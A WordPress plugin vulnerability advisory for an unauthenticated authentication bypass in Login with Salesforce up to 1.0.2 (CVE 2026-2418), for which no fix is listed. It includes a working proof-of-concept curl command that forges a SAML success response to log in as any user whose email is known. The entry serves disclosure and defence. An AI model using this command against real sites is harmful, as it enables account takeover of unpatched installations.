Login with Salesforce <= 1.0.2 – Unauthenticated Authentication Bypass | CVE 2026-2418 | Plugin Vulnerabilities

Description

The plugin does not validate that users are allowed to login through Salesforce, allowing unauthenticated users to be authenticated as any user (such as admin) by simply knowing the email

Proof of Concept

# Works if mo_saml_customer_token is empty (default)

```
curl -i -X POST "http://example.com/?option=readsamllogin" \
  -d "STATUS=SUCCESS" \
  -d "NameID=$(echo -n 'hacker@nxploit.com' | base64)"
```

If user exists, plugin sets wp_set_auth_cookie(). Admin access is achieved if plugin email is used by an admin.

Affects Plugins

login-with-salesforce

No known fix

References

CVE

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/Nxploited

Submitter twitter

Verified

Yes

WPVDB ID

b25c6cbc-39e7-4fa0-af0b-ee7759d2c497

Timeline

Publicly Published

2026-02-12 (about 1 month ago)

Added

2026-02-12 (about 1 month ago)

Last Updated

2026-02-12 (about 1 month ago)

Other

Published

Title

Published

2023-11-06

Title

Simple Social Buttons < 5.1.1 - Unauthenticated Password Protected Post Access

Published

2018-10-20

Title

Accelerated Mobile Pages <= 0.9.97.19 - Multiple Unauthenticated Vulnerabilities

Published

2025-06-02

Title

Golo < 1.7.1 - Authentication Bypass to Account Takeover

Published

2015-04-27

Title

WP Ultimate CSV Importer < 3.7.1 - Directory Traversal

Published

2025-03-07

Title

miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon < 200.3.10 - Authentication Bypass